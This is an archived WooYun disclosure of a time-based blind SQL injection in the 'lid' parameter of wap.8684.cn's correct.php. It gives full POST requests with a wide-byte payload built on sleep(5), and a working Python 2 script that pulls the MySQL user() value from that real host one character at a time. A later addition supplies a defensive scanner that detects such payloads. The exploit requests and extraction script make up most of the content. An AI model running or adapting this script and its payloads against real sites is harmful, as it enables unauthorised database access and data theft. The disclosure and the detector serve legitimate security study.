WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online archive -------------- http://drop.zone.ci/
2015-10-23: Details have been sent to the vendor and are awaiting the vendor's handling.
2015-10-28: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.
POST /correct.php?cityid=208 HTTP/1.1
Content-Length: 178
Content-Type: application/x-www-form-urlencoded
Referer: http://wap.8684.cn
Cookie: city_id=208; city_name=%E6%9C%94%E5%B7%9E; ecity=shuozhou; last_bus_from=1; last_bus_to=1; last_train_from=1; last_train_to=1; Hm_lvt_39435912262668f2c8c261584f242c8e=1445531533,1445531533,1445531533; Hm_lpvt_39435912262668f2c8c261584f242c8e=1445531533
Host: wap.8684.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

mod=%e6%8f%90%e4%ba%a4&ck=1&comp=Acunetix&desdw=1&desup=1&htime=1&hx=0&kind=1&ldw=1&lid=%bf'%bf%22+||1=if(length(user())=21,sleep(5),1)#&lname=frojhrkd&lup=1&price=1&qtime=1&yy=1
Injection point: lid. This started out as a wide-byte error-based injection, but after analysis it could not be exploited that way, because the application executes two SQL statements in a row. A time-delay injection was therefore constructed instead. Spaces are filtered; using || means no space is needed. When the condition is true there is a delay, so the length of user() is 21:
When the condition is false there is no delay:
The first character of user() is F (ASCII 70):
POST /correct.php?cityid=208 HTTP/1.1
Content-Length: 186
Content-Type: application/x-www-form-urlencoded
Referer: http://wap.8684.cn
Cookie: city_id=208; city_name=%E6%9C%94%E5%B7%9E; ecity=shuozhou; last_bus_from=1; last_bus_to=1; last_train_from=1; last_train_to=1; Hm_lvt_39435912262668f2c8c261584f242c8e=1445531533,1445531533,1445531533; Hm_lpvt_39435912262668f2c8c261584f242c8e=1445531533
Host: wap.8684.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

mod=%e6%8f%90%e4%ba%a4&ck=1&comp=Acunetix&desdw=1&desup=1&htime=1&hx=0&kind=1&ldw=1&lid=%bf'%bf%22+||1=if(ascii(MID(user(),1,1))=70,sleep(5),1)#&lname=frojhrkd&lup=1&price=1&qtime=1&yy=1
#encoding=utf-8
# Python 2 script (httplib): recovers user() one character at a time by
# measuring whether each request takes longer than the 5-second sleep().
import httplib
import time

headers = {'Cookie':'city_id=208; city_name=%E6%9C%94%E5%B7%9E; ecity=shuozhou; last_bus_from=1; last_bus_to=1; last_train_from=1; last_train_to=1; Hm_lvt_39435912262668f2c8c261584f242c8e=1445531533,1445531533,1445531533; Hm_lpvt_39435912262668f2c8c261584f242c8e=1445531533',
           'Content-Type':'application/x-www-form-urlencoded'}
# Candidate characters tried at each position of user()
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')

print '[%s] Start to retrieve MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 22):  # user() was measured to be 21 characters long
    for payload in payloads:
        # Same payload as the request above; %% yields a literal % after formatting
        s = "%%bf%%27%%bf%%22+||1=if(ascii(mid(user(),%s,1))=%s,sleep(5),1)#" % (i, ord(payload))
        s = "mod=%e6%8f%90%e4%ba%a4&ck=1&comp=Acunetix&desdw=1&desup=1&htime=1&hx=0&kind=1&ldw=1&lname=frojhrkd&lup=1&price=1&qtime=1&yy=1&lid=" + s
        conn = httplib.HTTPConnection('wap.8684.cn', timeout=100)
        start_time = time.time()
        conn.request('POST', '/correct.php?cityid=208', s, headers)
        h = conn.getresponse().read()
        conn.close()
        print '.',
        if time.time() - start_time > 5.0:  # delay observed: this character matched
            user += payload
            print '\n\n[in progress]', user,
            break
print '\n[Done] MySQL user is %s' % user
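A defender-side counterpart to the report above (an added example, not part of the original report): a scanner for form bodies that flags the three markers this payload depends on, namely a high byte placed before a quote to defeat backslash escaping under a GBK-style charset, a MySQL time-delay function, and a space-free OR ending in a comment. The attack body is the one from the requests above; the benign body is constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# 0x81-0xFE followed by a quote: a wide-byte prefix that can swallow the
# escaping backslash. Noisy on its own (UTF-8 text ending before a quote
# also matches), so it is reported as one reason among several.
WIDE_BYTE_QUOTE = re.compile(rb"[\x81-\xfe]['\"]")
# MySQL functions used for time-based blind injection
TIME_DELAY = re.compile(rb"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
# Comment markers that terminate the rest of the original statement
TAIL_COMMENT = re.compile(rb"(#|--\s|/\*)")

# Request body taken from the report above (only the lid field is hostile)
ATTACK_BODY = ("mod=%e6%8f%90%e4%ba%a4&ck=1&comp=Acunetix&desdw=1&desup=1&htime=1&hx=0"
               "&kind=1&ldw=1&lid=%bf'%bf%22+||1=if(length(user())=21,sleep(5),1)#"
               "&lname=frojhrkd&lup=1&price=1&qtime=1&yy=1")
# Constructed benign body: same form, numeric lid, UTF-8 text in mod
BENIGN_BODY = "mod=%e6%8f%90%e4%ba%a4&ck=1&ldw=1&lid=1024&lname=frojhrkd&yy=1"


def scan_form_body(body: str) -> dict:
    """Return {field: [reasons]} for suspicious fields of an
    application/x-www-form-urlencoded body.

    Decoding is done to bytes so a lone %bf stays 0xBF instead of being
    replaced by U+FFFD, which would hide the wide-byte prefix."""
    findings = {}
    for field in body.split("&"):
        name, _, raw = field.partition("=")
        value = unquote_to_bytes(raw.replace("+", " "))
        reasons = []
        if WIDE_BYTE_QUOTE.search(value):
            reasons.append("wide-byte quote prefix")
        if TIME_DELAY.search(value):
            reasons.append("time-delay function")
        if b"||" in value and TAIL_COMMENT.search(value):
            reasons.append("space-free OR with trailing comment")
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for label, body in (("attack", ATTACK_BODY), ("benign", BENIGN_BODY)):
        print(label, scan_form_body(body))
```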
Severity: No impact (vendor ignored)
Ignored at: 2015-10-28 15:00
Vulnerability Rank: 4 (WooYun rating)
None yet